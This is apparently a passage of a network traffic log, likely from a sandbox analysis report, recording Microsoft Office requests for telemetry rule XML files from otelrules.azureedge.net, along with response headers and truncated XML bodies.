                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      129 | 192.168.2.4 | 49882 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:49 UTC | 192 | OUT | GET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:50 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:49 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1397
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                      ETag: "0x8DC582BDFD43C07"
                                                                                                                                      x-ms-request-id: 3a99e642-c01e-0049-2bdd-41ac27000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221149Z-174f7845968n2hr8hC1EWR9cag000000107g000000004quc
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:50 UTC | 1397 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      130 | 192.168.2.4 | 49884 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:50 UTC | 192 | OUT | GET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:50 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:50 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1427
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                      ETag: "0x8DC582BE56F6873"
                                                                                                                                      x-ms-request-id: 417f12c6-b01e-003e-571e-428e41000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221150Z-174f78459685m244hC1EWRgp2c00000010b000000000dm38
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:50 UTC | 1427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      131 | 192.168.2.4 | 49885 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:51 UTC | 192 | OUT | GET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:51 UTC | 515 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:51 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1390
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                      ETag: "0x8DC582BE3002601"
                                                                                                                                      x-ms-request-id: e52eaca9-401e-0064-32a1-4254af000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221151Z-174f7845968n2hr8hC1EWR9cag000000102000000000payd
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:51 UTC | 1390 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      132 | 192.168.2.4 | 49886 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:51 UTC | 192 | OUT | GET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:52 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:51 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1401
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                      ETag: "0x8DC582BE2A9D541"
                                                                                                                                      x-ms-request-id: 2150929f-401e-0064-4382-3f54af000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221151Z-174f7845968zgtf6hC1EWRqd8s0000000thg0000000051hn
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:52 UTC | 1401 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      133 | 192.168.2.4 | 49887 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:51 UTC | 192 | OUT | GET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:52 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:52 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1364
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                      ETag: "0x8DC582BEB6AD293"
                                                                                                                                      x-ms-request-id: 902f1521-d01e-00a1-2fef-4135b1000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221152Z-174f7845968j6t2phC1EWRcfe800000010r00000000082dn
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:52 UTC | 1364 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
134 | 192.168.2.4 | 49883 | 13.107.246.63 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:52 UTC | 192 | OUT | GET /rules/rule700350v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:52 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:52 GMT
Content-Type: text/xml
Content-Length: 1360
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
ETag: "0x8DC582BDD74D2EC"
x-ms-request-id: a0e0d5c5-a01e-0084-68de-419ccd000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221152Z-174f7845968frfdmhC1EWRxxbw00000010n0000000006325
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:52 UTC | 1360 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
135 | 192.168.2.4 | 49888 | 13.107.246.63 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:52 UTC | 192 | OUT | GET /rules/rule702801v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:53 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:52 GMT
Content-Type: text/xml
Content-Length: 1391
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
ETag: "0x8DC582BDF58DC7E"
x-ms-request-id: 6de228a0-301e-0052-2e05-4165d6000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221152Z-174f7845968vqt9xhC1EWRgten00000010q00000000012ca
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:53 UTC | 1391 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


Session ID | Source IP | Source Port | Destination IP | Destination Port
136 | 192.168.2.4 | 49889 | 13.107.246.63 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:53 UTC | 192 | OUT | GET /rules/rule702800v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:53 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:53 GMT
Content-Type: text/xml
Content-Length: 1354
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
ETag: "0x8DC582BE0662D7C"
x-ms-request-id: bc455531-901e-0064-7a1b-41e8a6000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221153Z-174f7845968j6t2phC1EWRcfe800000010p000000000e63t
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:53 UTC | 1354 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


Session ID | Source IP | Source Port | Destination IP | Destination Port
137 | 192.168.2.4 | 49890 | 13.107.246.63 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:53 UTC | 192 | OUT | GET /rules/rule703351v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:54 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:54 GMT
Content-Type: text/xml
Content-Length: 1403
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
ETag: "0x8DC582BDCDD6400"
x-ms-request-id: 069fcaeb-401e-0016-5ff7-4153e0000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221154Z-174f7845968vqt9xhC1EWRgten00000010ng0000000053qk
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:54 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session ID | Source IP | Source Port | Destination IP | Destination Port
138 | 192.168.2.4 | 49892 | 13.107.246.63 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:54 UTC | 192 | OUT | GET /rules/rule703501v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:54 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:54 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
ETag: "0x8DC582BE8C605FF"
x-ms-request-id: 069be9ae-401e-0016-24f6-4153e0000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221154Z-174f78459684bddphC1EWRbht4000000108g00000000ah4z
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:54 UTC | 1399 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


Session ID | Source IP | Source Port | Destination IP | Destination Port
139 | 192.168.2.4 | 49891 | 13.107.246.63 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:54 UTC | 192 | OUT | GET /rules/rule703350v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:54 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:54 GMT
Content-Type: text/xml
Content-Length: 1366
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
ETag: "0x8DC582BDF1E2608"
x-ms-request-id: 75b435a0-401e-0048-0433-400409000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221154Z-174f78459685m244hC1EWRgp2c00000010d00000000077ps
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:54 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


Session ID | Source IP | Source Port | Destination IP | Destination Port
140 | 192.168.2.4 | 49893 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:55 UTC | 192 | OUT | GET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:55 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:55 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1362
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                      ETag: "0x8DC582BDF497570"
                                                                                                                                      x-ms-request-id: 581105fc-301e-0000-6a91-3feecc000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221155Z-174f7845968kvnqxhC1EWRmf3g0000000me0000000001grr
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:55 UTC | 1362 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
141 | 192.168.2.4 | 49894 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:55 UTC | 192 | OUT | GET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:55 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:55 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1403
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                      ETag: "0x8DC582BDC2EEE03"
                                                                                                                                      x-ms-request-id: 17f40f6b-801e-00a3-7e91-3f7cfb000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221155Z-174f7845968kvnqxhC1EWRmf3g0000000ma000000000d4rb
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:55 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session ID | Source IP | Source Port | Destination IP | Destination Port
142 | 192.168.2.4 | 49895 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:56 UTC | 192 | OUT | GET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:56 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:56 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1366
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                      ETag: "0x8DC582BEA414B16"
                                                                                                                                      x-ms-request-id: 629a3d73-e01e-0052-0991-3fd9df000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221156Z-174f7845968xr5c2hC1EWRd0hn0000000he00000000059df
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:56 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


Session ID | Source IP | Source Port | Destination IP | Destination Port
143 | 192.168.2.4 | 49896 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:56 UTC | 192 | OUT | GET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:56 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:56 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1399
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                      ETag: "0x8DC582BE1CC18CD"
                                                                                                                                      x-ms-request-id: 9f43eb8e-e01e-003c-5891-3fc70b000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221156Z-174f78459685m244hC1EWRgp2c00000010eg0000000036wx
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:56 UTC | 1399 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


Session ID | Source IP | Source Port | Destination IP | Destination Port
144 | 192.168.2.4 | 49897 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:56 UTC | 192 | OUT | GET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:57 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:57 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1362
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                      ETag: "0x8DC582BEB256F43"
                                                                                                                                      x-ms-request-id: 465003af-501e-00a3-2ca1-42c0f2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221157Z-174f7845968n2hr8hC1EWR9cag000000106g000000008ce9
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:57 UTC | 1362 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
145 | 192.168.2.4 | 49898 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:57 UTC | 192 | OUT | GET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:57 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:57 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1403
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                      ETag: "0x8DC582BEB866CDB"
                                                                                                                                      x-ms-request-id: 72821319-501e-0047-4515-41ce6c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221157Z-174f7845968kvnqxhC1EWRmf3g0000000mbg000000007zgz
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:57 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session ID | Source IP | Source Port | Destination IP | Destination Port
146 | 192.168.2.4 | 49899 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:57 UTC | 192 | OUT | GET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
Timestamp: 2024-11-29 22:11:58 UTC | Bytes transferred: 494 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:57 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1366
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                      ETag: "0x8DC582BE5B7B174"
                                                                                                                                      x-ms-request-id: 62c5240a-b01e-0097-3411-414f33000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221157Z-174f7845968pght8hC1EWRyvxg00000003kg00000000kr4k
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
Timestamp: 2024-11-29 22:11:58 UTC | Bytes transferred: 1366 | Direction: IN | Data:
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


Session ID: 147 | Source IP: 192.168.2.4 | Source Port: 49900 | Destination IP: 13.107.246.63 | Destination Port: 443
Timestamp: 2024-11-29 22:11:58 UTC | Bytes transferred: 192 | Direction: OUT | Data:
GET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
